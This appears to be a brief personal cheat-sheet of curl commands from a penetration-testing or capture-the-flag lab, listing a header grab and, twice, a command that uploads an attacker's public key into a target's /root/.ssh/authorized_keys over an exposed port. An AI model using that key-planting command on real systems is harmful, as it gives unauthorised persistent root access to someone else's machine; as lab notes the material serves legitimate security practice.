Curl
Grab headers of website
curl -I 192.168.71.75:8080
Upload ssh file
curl 10.129.230.87:9001/root/.ssh/authorized_keys --upload-file broker.pub
curl -I 192.168.71.75:8080
curl 10.129.230.87:9001/root/.ssh/authorized_keys --upload-file broker.pub